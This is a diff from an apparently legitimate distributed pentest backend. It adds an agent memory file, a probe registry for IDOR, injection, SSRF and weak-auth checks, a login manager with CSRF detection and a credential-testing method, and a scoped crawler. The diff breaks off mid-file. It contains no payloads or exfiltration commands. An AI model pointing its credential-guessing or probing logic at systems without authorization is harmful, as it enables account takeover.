diff --git a/extensions/business/cybersec/red_mesh/AGENTS.md b/extensions/business/cybersec/red_mesh/AGENTS.md new file mode 100644 index 00000000..bc950fd3 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/AGENTS.md @@ -0,0 +1,308 @@ +# RedMesh Backend Agent Memory + +Last updated: 2026-03-16T17:05:00Z + +## Purpose + +This file is the durable, append-only long-term memory for future agents working in the RedMesh backend implementation directory: + +- [`extensions/business/cybersec/red_mesh/`](./) + +Use it to preserve: +- code-level architecture facts +- backend-specific invariants +- important debugging references +- critical pitfalls +- timestamped memory entries for meaningful backend changes and major development stages + +Do not rewrite history. Corrections belong in new log entries that reference earlier ones. + +## Scope + +This `AGENTS.md` is RedMesh-backend-specific. + +Use the workspace-level memory for cross-repo planning and project-wide context: +- project-level RedMesh workspace `AGENTS.md` + +Use this file for: +- backend implementation memory +- module boundaries +- orchestration and persistence invariants +- testing and debugging conventions +- significant backend change history + +## Stable References + +### Core Entry Points + +- [`pentester_api_01.py`](./pentester_api_01.py) +- [`redmesh_llm_agent_api.py`](./redmesh_llm_agent_api.py) + +### Core Subsystems + +- [`services/`](./services) +- [`repositories/`](./repositories) +- [`models/`](./models) +- [`mixins/`](./mixins) +- [`worker/`](./worker) +- [`graybox/`](./graybox) + +### Key Supporting Modules + +- [`constants.py`](./constants.py) +- [`findings.py`](./findings.py) +- [`cve_db.py`](./cve_db.py) + +### Tests + +- [`tests/`](./tests) +- [`test_redmesh.py`](./test_redmesh.py) + +### Historical Context + +- [`.old_docs/HISTORY.md`](./.old_docs/HISTORY.md) + +## Architecture Snapshot + +RedMesh is a distributed pentest backend running on Ratio1 edge nodes. 
It coordinates scans across nodes, stores job state in CStore, persists large artifacts in R1FS, and exposes FastAPI endpoints consumed by Navigator and local operators. + +High-level responsibilities: +- launch and coordinate network and graybox jobs +- distribute work across edge nodes +- track runtime progress +- aggregate worker reports +- finalize archives and derived metadata +- optionally run LLM analysis on aggregated reports +- expose audit, archive, report, progress, triage, and analysis APIs + +### Current Major Boundaries + +- `pentester_api_01.py` + - main orchestration plugin + - launch endpoints + - process-loop coordination + - API read paths + +- `services/` + - extracted lifecycle, query, launch, state-machine, control, finalization, resilience, and secret-handling logic + +- `repositories/` + - storage boundaries for CStore and R1FS-style artifacts + +- `models/` + - typed job/config/archive/report/triage structures + +- `worker/` + - network worker implementation and feature-specific probe modules + +- `graybox/` + - authenticated webapp scan models, runtime flow, auth lifecycle, safety gates, and probe families + +- `mixins/` + - live progress, reporting, risk scoring, attestation, and LLM behavior extracted from the main plugin + +## Critical Invariants + +### Storage and Ownership + +- CStore job records are the shared orchestration state for distributed work. +- R1FS stores large immutable artifacts such as reports, configs, and archives. +- Finalized jobs are represented in CStore as stubs plus `job_cid`; archive payloads are authoritative for finalized history. +- Read paths for finalized data should prefer archive-backed retrieval over assuming live CStore detail still exists. + +### Job Lifecycle + +- Launcher node is responsible for distributed orchestration and finalization. +- Workers are selected per job and assigned explicit ranges/config. 
+- Aggregated analysis should run on the combined multi-worker report, not a single-worker report. +- A job should converge to an explicit terminal state; indefinite `RUNNING` due to a missing worker is a bug. + +### Findings and Reports + +- Structured findings are the backend contract; string-only vulnerability outputs are legacy history, not the target model. +- Severity, evidence, remediation, and typed finding metadata should remain normalized across network and graybox paths. +- Mutable analyst triage state must remain separate from immutable scan/archive records. + +### Security and Secret Handling + +- Archive/report redaction is not equivalent to secure secret persistence. +- Graybox secret storage boundaries are security-sensitive and should be treated as architecture, not cosmetic cleanup. +- Safe defaults matter for redaction, ICS-safe behavior, rate limiting, and authorization confirmation. + +### Distributed Runtime State + +- Shared job blobs are vulnerable to lost-update races if multiple nodes write unrelated fields concurrently. +- Worker-owned runtime state should prefer isolated records over concurrent writes into the same job document. +- Launcher-side reconciliation is safer than trusting many workers to merge shared orchestration state correctly. +- Nested config blocks should resolve through one shared shallow merge helper, with validation kept in subsystem-specific wrappers. 
+ +## Testing and Verification + +Primary backend test commands: + +```bash +cd edge_node +python -m pytest extensions/business/cybersec/red_mesh/test_redmesh.py -v +``` + +```bash +cd edge_node +python -m pytest extensions/business/cybersec/red_mesh/tests -v +``` + +Useful targeted runs: + +```bash +cd edge_node +python -m pytest extensions/business/cybersec/red_mesh/tests/test_api.py -v +``` + +```bash +cd edge_node +python -m pytest extensions/business/cybersec/red_mesh/tests/test_regressions.py -v +``` + +```bash +cd edge_node +python -m pytest extensions/business/cybersec/red_mesh/tests/test_state_machine.py -v +``` + +## Debugging Conventions + +- Prefer reading both live API state and persisted logs when investigating distributed-job issues. +- For finalized-job read bugs, verify whether the true source of truth is CStore stub data or archive data in R1FS. +- For stuck distributed jobs, inspect: + - launcher job record + - per-worker status/progress visibility + - whether every assigned worker actually observed the job + - whether missing workers were unhealthy at assignment time +- Distinguish clearly between: + - scan execution failures + - orchestration failures + - archive/read-path failures + - LLM post-processing failures + +## Pitfalls + +- `get_job_status` can look locally “complete” while the distributed job is still incomplete. +- Finalized jobs are pruned to CStore stubs; assuming live pass reports remain in CStore is incorrect. +- Shared CStore writes without guarded semantics can lose unrelated updates. +- LLM failure and analysis retrieval are separate problems; missing analysis text is not always a UI issue. +- Graybox and network paths now share more contracts than before; avoid fixing one while silently breaking the other. 
+ +## Mandatory BUILDER-CRITIC Loop + +For every meaningful RedMesh backend modification, future agents must record and follow this loop in their work output and, for critical/fundamental changes, summarize the result in the Memory Log. + +### 1. BUILDER + +State: +- intent +- files or systems to change +- expected behavioral change + +### 2. CRITIC + +Adversarially try to break the change: +- wrong assumptions +- orchestration/storage mismatches +- regressions +- security impact +- distributed-state edge cases +- missing tests +- missing docs +- operational risks + +### 3. BUILDER Response + +Refine or defend the change: +- what changed after critique +- what remains risky +- exact verification commands +- actual verification results + +Minimum bar: +- no meaningful RedMesh backend change is complete without a documented CRITIC pass +- no critical orchestration/storage change is complete without verification commands and results +- if verification cannot run, record that explicitly + +## Memory Log (append-only) + +Only append entries for critical or fundamental RedMesh backend changes, discoveries, or horizontal insights. Do not add routine edits. + +### 2025-08-27 to 2025-10-04 + +- Stage: initial RedMesh backend creation and early productionization. +- Change: established the original distributed pentest backend with `pentester_api_01.py`, `PentestLocalWorker`, basic service probes, and early web checks. +- Change: added the first test suite and expanded protocol/web coverage beyond basic banner grabbing. +- Horizontal insight: RedMesh started as a network-first scanning backend and only later grew into a richer orchestration and analysis platform. + +### 2025-12-08 to 2025-12-22 + +- Stage: distributed orchestration hardening and feature-catalog expansion. +- Change: added startup coordination fixes, chainstore handling fixes, and a major overhaul of multi-node job coordination. 
+- Change: introduced the feature catalog and explicit capability-driven execution model in [`constants.py`](./constants.py). +- Horizontal insight: the December 2025 update was the major transition from a simple scanner plugin to a configurable distributed scanning platform. + +### 2026-01-28 to 2026-02-19 + +- Stage: worker-state fixes, LLM integration, deep probes, structured findings, and web architecture refactor. +- Change: fixed worker-entry handling from CStore, then added DeepSeek-backed LLM analysis through a dedicated agent path. +- Change: expanded deep service probes across SSH, FTP, Telnet, HTTP, TLS, databases, and infrastructure protocols. +- Change: split monolithic web logic into OWASP-aligned mixins and completed the migration to structured findings plus CVE matching. +- Horizontal insight: by 2026-02-19, structured findings became the core backend contract and should be treated as foundational rather than optional formatting. + +### 2026-02-20 + +- Stage: security-control baseline added across backend and Navigator integration. +- Change: added credential redaction, ICS safe mode, rate limiting, scanner identity controls, audit logging, and authorization gating. +- Horizontal insight: RedMesh security controls affect the full path from UI input to backend runtime and archive persistence; future changes should be reviewed end-to-end, not only in the plugin code. + +### 2026-03-07 to 2026-03-10 + +- Stage: observability and backend decomposition. +- Change: added live worker progress endpoints, per-thread metrics/ports visibility, node IP stamping, hard stop support, purge/delete flows, and improved progress loading. +- Change: refactored a growing monolith into more granular mixins, worker modules, and split tests. +- Horizontal insight: progress and observability became first-class runtime concerns, not just UI convenience features. + +### 2026-03-10 to 2026-03-11 + +- Stage: graybox architecture introduction and typed execution boundaries. 
+- Change: introduced graybox core modules, auth/discovery/safety flows, worker/API integration, launch API split by scan type, feature capability modeling by scan type, and extracted launch strategies/state machine. +- Change: expanded graybox probes and tests, including access control, business logic, misconfiguration, and injection families. +- Horizontal insight: RedMesh is no longer only a distributed port scanner; it is a dual-mode backend with both network and authenticated webapp execution paths. +- Critical continuity rule: future agents must treat network and graybox paths as coupled contracts wherever findings, progress, launch state, and archive/read behavior overlap. + +### 2026-03-12 + +- Stage: service extraction, repository/model boundaries, pass-cap hardening, and stronger storage design. +- Change: extracted query, launch, lifecycle, repository, and service boundaries from `pentester_api_01.py`. +- Change: enforced continuous-pass caps, normalized running-job state, introduced repository boundaries, and split graybox secrets from plain job config. +- Horizontal insight: after this stage, RedMesh backend work should prefer service/repository/model boundaries over adding more behavior directly to the monolithic plugin file. +- Critical continuity rule: storage-affecting work should flow through the typed repository/model/service boundaries unless there is a clear reason not to. + +### 2026-03-13 + +- Stage: secret-boundary hardening, typed graybox artifacts, finding triage, resilience, and regression coverage. +- Change: hardened secret-storage boundaries, typed graybox runtime/probe/evidence flows, normalized graybox finding contracts, added finding triage state and CVSS metadata, and strengthened resilience/launch policy. +- Change: added regression and contract suites, hardened live progress metadata, hardened LLM failure handling, and preserved pass reports during finalization. 
+- Horizontal insight: RedMesh now has explicit architecture around evidence artifacts, triage state, and regression protection; future work should extend those contracts rather than bypass them. + +### 2026-03-16 + +- Change: added this backend-local [`AGENTS.md`](./AGENTS.md) to keep RedMesh-specific implementation memory separate from workspace-level planning memory. +- Change: identified a distributed-job orchestration gap where an assigned worker can miss the initial CStore job announcement and the launcher can wait indefinitely. +- Change: added a companion implementation tracker for distributed job reconciliation in the shared RedMesh project docs. +- Horizontal insight: current launcher/worker orchestration is strong enough to distribute work, but not yet strong enough to guarantee convergence when a peer misses assignment visibility; future agents should treat worker-owned runtime state and launcher-side reconciliation as the preferred fix direction. + +### 2026-03-16T17:05:00Z + +- Change: extracted a generic nested-config resolver in [`services/config.py`](./services/config.py) and moved distributed job reconciliation config onto that shared path. +- Horizontal insight: RedMesh should centralize nested config block merge semantics, but keep validation local to each subsystem wrapper rather than introducing a broad deep-merge config framework prematurely. + +### 2026-03-16T20:40:00Z + +- Change: introduced a dedicated LLM payload-shaping boundary in [`mixins/llm_agent.py`](./mixins/llm_agent.py) so RedMesh no longer sends the full aggregated report directly to the LLM path. +- Change: added network and webapp-specific compact payload shaping, finding deduplication/ranking/capping, analysis-type budgets, and runtime payload-size observability. +- Verification: the known failing job `a3a357bc` dropped from `303,760` raw bytes to `21,559` shaped bytes for `security_assessment` and completed manually in `38.97s` on rm1 instead of timing out. 
+- Horizontal insight: RedMesh archive/report data and LLM reasoning data must remain separate contracts; future LLM work should extend the bounded payload model rather than re-coupling the agent to raw archived aggregates. diff --git a/extensions/business/cybersec/red_mesh/constants.py b/extensions/business/cybersec/red_mesh/constants.py index d6face4a..f9eb9670 100644 --- a/extensions/business/cybersec/red_mesh/constants.py +++ b/extensions/business/cybersec/red_mesh/constants.py @@ -2,6 +2,33 @@ RedMesh constants and feature catalog definitions. """ +from enum import Enum + + +class ScanType(str, Enum): + """Scan type enum — extensible for future scan types (api, mobile, etc.).""" + NETWORK = "network" + WEBAPP = "webapp" + + +# Graybox probe registry — decouples probe addition from worker code. +# Adding a new probe = new probe file + new registry entry. No worker changes. +# Capabilities (requires_auth, requires_regular_session, is_stateful) live on +# the ProbeBase subclass, not in the registry — single source of truth. 
+GRAYBOX_PROBE_REGISTRY = [ + {"key": "_graybox_access_control", "cls": "access_control.AccessControlProbes"}, + {"key": "_graybox_misconfig", "cls": "misconfig.MisconfigProbes"}, + {"key": "_graybox_injection", "cls": "injection.InjectionProbes"}, + {"key": "_graybox_business_logic", "cls": "business_logic.BusinessLogicProbes"}, +] + +# Graybox timing and limits +GRAYBOX_DEFAULT_DELAY = 0.2 +GRAYBOX_WEAK_AUTH_DELAY = 1.0 +GRAYBOX_MAX_WEAK_ATTEMPTS = 20 +GRAYBOX_SESSION_MAX_AGE = 1800 + + FEATURE_CATALOG = [ { "id": "service_info_common", @@ -100,9 +127,33 @@ "description": "Post-scan analysis: honeypot detection, OS consistency, infrastructure leak aggregation.", "category": "correlation", "methods": ["_post_scan_correlate"] - } + }, + { + "id": "graybox", + "label": "Authenticated webapp testing", + "description": "OWASP-mapped application probes requiring login credentials: IDOR, privilege escalation, business logic, misconfiguration, injection, SSRF, and weak authentication.", + "category": "graybox", + "methods": [entry["key"] for entry in GRAYBOX_PROBE_REGISTRY] + ["_graybox_weak_auth"], + }, ] + +NETWORK_FEATURE_CATEGORIES = ("service", "web", "correlation") +NETWORK_FEATURE_REGISTRY = { + category: tuple( + method + for item in FEATURE_CATALOG + if item.get("category") == category + for method in item.get("methods", []) + ) + for category in NETWORK_FEATURE_CATEGORIES +} +NETWORK_FEATURE_METHODS = tuple( + method + for category in NETWORK_FEATURE_CATEGORIES + for method in NETWORK_FEATURE_REGISTRY[category] +) + # Job status constants JOB_STATUS_RUNNING = "RUNNING" JOB_STATUS_COLLECTING = "COLLECTING" # Launcher merging worker reports @@ -246,12 +297,6 @@ JOB_ARCHIVE_VERSION = 1 MAX_CONTINUOUS_PASSES = 100 -# ===================================================================== -# Live progress publishing -# ===================================================================== - -PROGRESS_PUBLISH_INTERVAL = 10 # seconds between progress updates to CStore - 
# Scan phases in execution order (5 phases total) PHASE_ORDER = ["port_scan", "fingerprint", "service_probes", "web_tests", "correlation"] PHASE_MARKERS = { @@ -260,3 +305,9 @@ "web_tests": "web_tests_completed", "correlation": "correlation_completed", } + +# Graybox scan phases in execution order +GRAYBOX_PHASE_ORDER = [ + "preflight", "authentication", "discovery", "graybox_probes", + "weak_auth", +] diff --git a/extensions/business/cybersec/red_mesh/docs/resume-checkpoint-boundary.md b/extensions/business/cybersec/red_mesh/docs/resume-checkpoint-boundary.md new file mode 100644 index 00000000..ff68b84e --- /dev/null +++ b/extensions/business/cybersec/red_mesh/docs/resume-checkpoint-boundary.md @@ -0,0 +1,34 @@ +# RedMesh Resume and Checkpoint Boundary + +This document records the Phase 6 checkpoint boundary without implementing resumable execution yet. + +## Safe to Resume + +- Archive read queries can be retried because they are immutable reads. +- Archive verification after write can be retried because it does not mutate job state. +- LLM analysis calls can be retried because the pass report is updated only after a successful response. +- Attestation submission can be retried before the attestation result is persisted into job state. + +## Restart From Scratch + +- Active worker execution inside a pass must restart from the beginning of the pass. +- Graybox authenticated probe execution must restart from a fresh authentication flow. +- Partial pass aggregation must restart from collected worker reports rather than replaying mid-pass state. 
+ +## Checkpoint Candidates + +- Immutable `job_config_cid` +- Completed `pass_reports` +- Finalized `job_cid` +- Mutable `job_revision` +- Triage state and triage audit + +## Explicit Non-Goals + +- No mid-pass resume token +- No worker-side checkpoint serialization +- No replay of partially completed graybox sessions + +## Design Rule + +RedMesh may resume only from durable, integrity-checked boundaries that are already represented as immutable artifacts or explicit mutable orchestration records. Any state that depends on live sockets, authenticated sessions, or partial aggregation must restart. diff --git a/extensions/business/cybersec/red_mesh/findings.py b/extensions/business/cybersec/red_mesh/findings.py index 17b08ef8..ea1a7a83 100644 --- a/extensions/business/cybersec/red_mesh/findings.py +++ b/extensions/business/cybersec/red_mesh/findings.py @@ -32,6 +32,8 @@ class Finding: owasp_id: str = "" # e.g. "A07:2021" cwe_id: str = "" # e.g. "CWE-287" confidence: str = "firm" # certain | firm | tentative + cvss_score: float | None = None + cvss_vector: str = "" def probe_result(*, raw_data: dict = None, findings: list = None) -> dict: diff --git a/extensions/business/cybersec/red_mesh/graybox/__init__.py b/extensions/business/cybersec/red_mesh/graybox/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/extensions/business/cybersec/red_mesh/graybox/auth.py b/extensions/business/cybersec/red_mesh/graybox/auth.py new file mode 100644 index 00000000..9a502572 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/auth.py @@ -0,0 +1,379 @@ +""" +Authentication manager for graybox scanning. + +Handles CSRF auto-detection, login with robust success detection, +session expiry, re-auth, and cleanup. 
+""" + +import re +import time + +import requests + +from ..constants import GRAYBOX_SESSION_MAX_AGE +from .models.target_config import COMMON_CSRF_FIELDS +from .models import GrayboxAuthState + + +class AuthManager: + MAX_AUTH_ATTEMPTS = 2 + AUTH_RETRY_DELAY_SECONDS = 0.25 + + """ + Manages authenticated HTTP sessions for graybox probes. + + Handles CSRF auto-detection, login with robust success detection, + session expiry, re-auth, and cleanup. + """ + + def __init__(self, target_url, target_config, verify_tls=True): + self.target_url = target_url.rstrip("/") + self.target_config = target_config + self.verify_tls = verify_tls + + self.anon_session = None + self.official_session = None + self.regular_session = None + self._created_at = 0.0 + self._refresh_count = 0 + self._auth_errors = [] + self._detected_csrf_field = None + + @property + def detected_csrf_field(self) -> str | None: + """Public read access to the auto-detected CSRF field name.""" + return self._detected_csrf_field + + @property + def is_expired(self) -> bool: + return time.time() - self._created_at > GRAYBOX_SESSION_MAX_AGE + + @property + def auth_state(self) -> GrayboxAuthState: + return GrayboxAuthState( + created_at=self._created_at, + refresh_count=self._refresh_count, + official_authenticated=self.official_session is not None, + regular_authenticated=self.regular_session is not None, + auth_errors=tuple(self._auth_errors), + ) + + def needs_refresh(self, require_regular=False) -> bool: + if self.is_expired: + return True + if self.official_session is None: + return True + if require_regular and self.regular_session is None: + return True + return False + + def ensure_sessions(self, official_creds, regular_creds=None): + """Re-authenticate if sessions are stale or not yet created.""" + regular_creds = self._coerce_creds(regular_creds) + require_regular = bool(regular_creds and regular_creds.get("username")) + if not self.needs_refresh(require_regular=require_regular): + return True + 
self.cleanup() + self._refresh_count += 1 + auth_ok = self.authenticate(official_creds, regular_creds) + if not auth_ok: + self.cleanup() + return auth_ok + + def authenticate(self, official_creds, regular_creds=None): + """Create fresh sessions for all configured users.""" + self.anon_session = self._make_session() + official_creds = self._coerce_creds(official_creds) + regular_creds = self._coerce_creds(regular_creds) + self._auth_errors = [] + + self.official_session = self._try_login_with_retry( + "official", + official_creds["username"], + official_creds["password"], + ) + if not self.official_session: + return False + + if regular_creds and regular_creds.get("username"): + self.regular_session = self._try_login_with_retry( + "regular", + regular_creds["username"], + regular_creds["password"], + ) + if not self.regular_session: + self._record_auth_error("regular_login_failed") + + self._created_at = time.time() + return True + + @staticmethod + def _coerce_creds(creds): + if creds is None: + return None + if isinstance(creds, dict): + return { + "username": creds.get("username", ""), + "password": creds.get("password", ""), + } + return { + "username": getattr(creds, "username", "") or "", + "password": getattr(creds, "password", "") or "", + } + + def cleanup(self): + """ + Explicitly close sessions and attempt logout. + + Prevents session accumulation on targets with session limits. + """ + logout_url = self.target_url + self.target_config.logout_path + for session in [self.official_session, self.regular_session]: + if session is None: + continue + try: + session.get(logout_url, timeout=5) + except requests.RequestException: + pass + finally: + session.close() + if self.anon_session: + self.anon_session.close() + self.official_session = None + self.regular_session = None + self.anon_session = None + self._created_at = 0.0 + + def preflight_check(self) -> str | None: + """ + Verify target reachability and login page existence. 
+ + Returns error message if preflight fails, None if OK. + """ + # 1. Target reachable? + try: + requests.head( + self.target_url, + timeout=10, + verify=self.verify_tls, + allow_redirects=True, + ) + except requests.RequestException as exc: + return f"Target unreachable: {exc}" + + # 2. Login page exists? + login_url = self.target_url + self.target_config.login_path + try: + resp = requests.get(login_url, timeout=10, verify=self.verify_tls) + if resp.status_code == 404: + return f"Login page not found: {login_url} returned 404" + except requests.RequestException as exc: + return f"Login page unreachable: {exc}" + + return None + + def _make_session(self): + s = requests.Session() + s.verify = self.verify_tls + return s + + def make_anonymous_session(self): + """ + Public API for creating anonymous sessions. + + Used by probes that need a fresh session for lockout detection + or anonymous endpoint testing. + """ + return self._make_session() + + def try_credentials(self, username, password): + """ + Public API for credential testing (used by weak-auth probe). + + Returns a Session on success (caller must close it), None on failure. + """ + return self._try_login(username, password) + + def _record_auth_error(self, code): + self._auth_errors.append(code) + + def _try_login_with_retry(self, principal, username, password): + retryable_failure = False + for attempt in range(1, self.MAX_AUTH_ATTEMPTS + 1): + session, retryable_failure = self._try_login_attempt(username, password) + if session is not None: + return session + if not retryable_failure: + break + if attempt < self.MAX_AUTH_ATTEMPTS: + time.sleep(self.AUTH_RETRY_DELAY_SECONDS) + + if retryable_failure: + self._record_auth_error(f"{principal}_login_transport_error") + else: + self._record_auth_error(f"{principal}_login_failed") + return None + + def _try_login(self, username, password): + """ + Attempt login with CSRF auto-detection and robust success detection. 
+ """ + session, _ = self._try_login_attempt(username, password) + return session + + def _try_login_attempt(self, username, password): + """ + Attempt one login and classify whether failure is retryable. + """ + session = self._make_session() + login_url = self.target_url + self.target_config.login_path + + # GET login page + try: + resp = session.get(login_url, timeout=10, allow_redirects=True) + except requests.RequestException: + session.close() + return None, True + + # Auto-detect or use configured CSRF field + csrf_field, csrf_token = self._extract_csrf(resp.text) + + payload = { + self.target_config.username_field: username, + self.target_config.password_field: password, + } + headers = {"Referer": login_url} + if csrf_token and csrf_field: + payload[csrf_field] = csrf_token + headers["X-CSRFToken"] = csrf_token + + try: + resp = session.post( + login_url, data=payload, headers=headers, + timeout=10, allow_redirects=True, + ) + except requests.RequestException: + session.close() + return None, True + + # Robust success detection + if self._is_login_success(resp, session, login_url): + return session, False + + session.close() + return None, False + + def _is_login_success(self, response, session, login_url): + """ + Determine if login succeeded. + + Checks (in order): + 1. HTTP error -> fail + 2. Response body contains failure markers -> fail + 3. JSON error responses -> fail + 4. Redirected away from login page AND cookies present -> success + 5. Non-empty session cookies -> success + """ + if response.status_code >= 400: + return False + + # Check for failure markers in response body. + # Use multi-word phrases to avoid false matches — single words like + # "failed" can appear in legitimate post-login content. 
+ failure_markers = [ + "invalid credentials", "invalid username", "invalid password", + "incorrect password", "login failed", "authentication failed", + "try again", "wrong password", "unable to log in", + "account locked", "account disabled", + ] + body_lower = response.text.lower() + if any(marker in body_lower for marker in failure_markers): + return False + + # SPA support: check JSON error responses + ct = response.headers.get("content-type", "") + if "application/json" in ct: + try: + data = response.json() + if isinstance(data, dict): + if data.get("error") or data.get("success") is False or data.get("authenticated") is False: + return False + except ValueError: + pass + + has_cookies = bool(session.cookies.get_dict()) + + # Redirect away from login URL — require cookies to confirm + # session was actually established. + if response.url and "login" not in response.url.lower(): + if has_cookies: + return True + + # Redirect chain present and final URL differs AND cookies set + if response.history and login_url not in response.url: + if has_cookies: + return True + + # Has auth-relevant cookies (even without redirect — SPA logins) + return has_cookies + + def _extract_csrf(self, html): + """ + Extract CSRF token from HTML. + + If csrf_field is configured, use it directly. + Otherwise, try common framework field names. + Returns (field_name, token_value) tuple. 
+ """ + if self.target_config.csrf_field: + token = self._find_csrf_value(html, self.target_config.csrf_field) + return (self.target_config.csrf_field, token) + + # Auto-detect: try common CSRF field names + if self._detected_csrf_field: + token = self._find_csrf_value(html, self._detected_csrf_field) + if token: + return (self._detected_csrf_field, token) + + for field_name in COMMON_CSRF_FIELDS: + token = self._find_csrf_value(html, field_name) + if token: + self._detected_csrf_field = field_name + return (field_name, token) + + # Fallback: any hidden input with "csrf" or "token" in name + m = re.search( + r']+type=["\']hidden["\'][^>]+name=["\']([^"\']*(?:csrf|token)[^"\']*)["\'][^>]+value=["\']([^"\']+)', + html or "", re.IGNORECASE, + ) + if m: + self._detected_csrf_field = m.group(1) + return (m.group(1), m.group(2)) + + return (None, None) + + @staticmethod + def extract_csrf_value(html, field_name): + """ + Public API for CSRF value extraction from HTML. + + Used by probes that need to include CSRF tokens in form submissions. + """ + return AuthManager._find_csrf_value(html, field_name) + + @staticmethod + def _find_csrf_value(html, field_name): + """Find value of a named hidden input field.""" + # Try name->value order + m = re.search( + rf'name=["\']?{re.escape(field_name)}["\']?\s[^>]*value=["\']([^"\']+)', + html or "", re.IGNORECASE, + ) + if m: + return m.group(1) + # Try value->name order (some frameworks emit attrs differently) + m = re.search( + rf'value=["\']([^"\']+)["\'][^>]*name=["\']?{re.escape(field_name)}["\']?', + html or "", re.IGNORECASE, + ) + return m.group(1) if m else None diff --git a/extensions/business/cybersec/red_mesh/graybox/discovery.py b/extensions/business/cybersec/red_mesh/graybox/discovery.py new file mode 100644 index 00000000..b44aea12 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/graybox/discovery.py @@ -0,0 +1,197 @@ +""" +Route and form discovery for graybox scanning. 
"""
Route and form discovery for graybox scanning.

BFS crawl with scope boundaries, page/depth limits,
and form collection without blind POSTs.
"""

import posixpath
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

import requests

from .models import DiscoveryResult


class _RouteParser(HTMLParser):
    """Extract href and form action attributes from HTML."""

    def __init__(self):
        super().__init__()
        self.links = []  # raw <a href> values, in document order
        self.forms = []  # raw <form action> values, in document order

    def handle_starttag(self, tag, attrs):
        attrs_map = dict(attrs)
        if tag == "a" and attrs_map.get("href"):
            self.links.append(attrs_map["href"])
        if tag == "form" and attrs_map.get("action"):
            self.forms.append(attrs_map["action"])


class DiscoveryModule:
    """
    Route and form discovery with scope boundaries.

    Scope constraints:
    - Same-origin only: external domain links are ignored
    - Optional path prefix: only crawl under scope_prefix
    - Depth/page limits: prevent unbounded crawling
    - Form actions recorded but NOT followed (no blind POSTs)
    """

    def __init__(self, target_url, auth_manager, safety, target_config):
        self.target_url = target_url.rstrip("/")
        self.auth = auth_manager
        self.safety = safety
        self._target_host = urlparse(target_url).netloc
        self._scope_prefix = target_config.discovery.scope_prefix
        self._max_pages = target_config.discovery.max_pages
        self._max_depth = target_config.discovery.max_depth
        self.routes = []  # result of the last crawl (sorted paths)
        self.forms = []   # result of the last crawl (sorted form actions)

    def discover(self, known_routes=None):
        """
        Discover application routes and forms.

        Tuple-returning compatibility wrapper around discover_result().

        BUGFIX: this method previously ran a complete BFS crawl, discarded
        its results, and then called discover_result() which crawled the
        whole target a second time — doubling request volume (and throttle
        delay) against the target. It now delegates directly.
        """
        return self.discover_result(known_routes=known_routes).to_tuple()

    def discover_result(self, known_routes=None) -> DiscoveryResult:
        """
        Crawl the target and return a typed DiscoveryResult.

        Combines user-supplied routes with crawled routes; respects
        same-origin, scope-prefix, and page/depth limits. Updates
        self.routes / self.forms as a side effect.
        """
        visited = set()
        to_visit = deque([("/", 0)])

        # Seed the queue with caller-provided routes at depth 0.
        if known_routes:
            for route in known_routes:
                if self._in_scope(route):
                    to_visit.append((route, 0))

        all_routes = set()
        all_forms = set()

        while to_visit and len(visited) < self._max_pages:
            path, depth = to_visit.popleft()
            if path in visited:
                continue
            visited.add(path)

            # Rate-limit between requests.
            self.safety.throttle()

            # Prefer the authenticated session; fall back to anonymous.
            session = self.auth.official_session or self.auth.anon_session
            if session is None:
                break

            url = self.target_url + path
            try:
                resp = session.get(url, timeout=10, allow_redirects=True)
            except requests.RequestException:
                continue

            all_routes.add(path)

            # Only parse HTML responses for further links.
            if "text/html" not in resp.headers.get("Content-Type", ""):
                continue

            parser = _RouteParser()
            try:
                parser.feed(resp.text)
            except Exception:
                continue

            # Enqueue in-scope links until the depth limit is reached.
            if depth < self._max_depth:
                for link in parser.links:
                    normalized = self._normalize(link)
                    if normalized and normalized not in visited and self._in_scope(normalized):
                        to_visit.append((normalized, depth + 1))

            # Record form actions but do NOT follow them (no blind POSTs).
            for action in parser.forms:
                normalized = self._normalize(action)
                if normalized and self._in_scope(normalized):
                    all_forms.add(normalized)

        self.routes = sorted(all_routes)
        self.forms = sorted(all_forms)
        return DiscoveryResult(routes=self.routes, forms=self.forms)

    def _normalize(self, raw):
        """Normalize a link to a same-origin, canonical path ("" if out of scope)."""
        if not raw or raw.startswith(("#", "javascript:", "mailto:")):
            return ""
        # NOTE(review): relative links are resolved against the site root,
        # not the page they were found on — confirm this is intended.
        joined = urljoin(self.target_url + "/", raw)
        parsed = urlparse(joined)
        # Same-origin check.
        if parsed.netloc and parsed.netloc != self._target_host:
            return ""
        # Canonicalize path to collapse ".." segments.
        path = posixpath.normpath(parsed.path or "/")
        # normpath strips trailing slash; preserve it for directory-style paths.
        if (parsed.path or "").endswith("/") and not path.endswith("/"):
            path += "/"
        return path

    def _in_scope(self, path):
        """Check if path is within the configured scope prefix."""
        if not self._scope_prefix:
            return True
        return path.startswith(self._scope_prefix)
"""
Structured findings for authenticated webapp (graybox) probes.

GrayboxFinding is the probe-level finding type. It is converted to a
unified flat finding dict (matching blackbox findings) at the report
level via to_flat_finding(). The blackbox Finding in findings.py is
NOT modified.
"""

from __future__ import annotations

import hashlib  # hoisted from to_flat_finding() — module-level per PEP 8
from dataclasses import dataclass, asdict, field
from typing import Any


@dataclass(frozen=True)
class GrayboxEvidenceArtifact:
    """Typed graybox evidence payload kept alongside legacy string summaries."""
    summary: str = ""            # short human-readable description
    request_snapshot: str = ""   # sanitized request reproduction
    response_snapshot: str = ""  # sanitized response excerpt
    captured_at: str = ""        # capture timestamp (string form)
    raw_evidence_cid: str = ""   # content id of the full raw evidence, if stored
    sensitive: bool = False      # True when the payload must be redacted downstream

    @classmethod
    def from_value(cls, value: Any) -> "GrayboxEvidenceArtifact":
        """
        Coerce an artifact, persisted dict, or legacy string summary
        into a GrayboxEvidenceArtifact; anything else yields an empty one.
        """
        if isinstance(value, GrayboxEvidenceArtifact):
            return value
        if isinstance(value, dict):
            return cls(
                summary=value.get("summary", "") or "",
                request_snapshot=value.get("request_snapshot", "") or "",
                response_snapshot=value.get("response_snapshot", "") or "",
                captured_at=value.get("captured_at", "") or "",
                raw_evidence_cid=value.get("raw_evidence_cid", "") or "",
                sensitive=bool(value.get("sensitive", False)),
            )
        if isinstance(value, str):
            return cls(summary=value)
        return cls()

    def to_dict(self) -> dict[str, Any]:
        """JSON-safe serialization."""
        return asdict(self)


@dataclass(frozen=True)
class GrayboxFinding:
    """
    Structured finding from an authenticated web-application probe.

    Uses structured evidence (list of key=value strings), multiple CWEs,
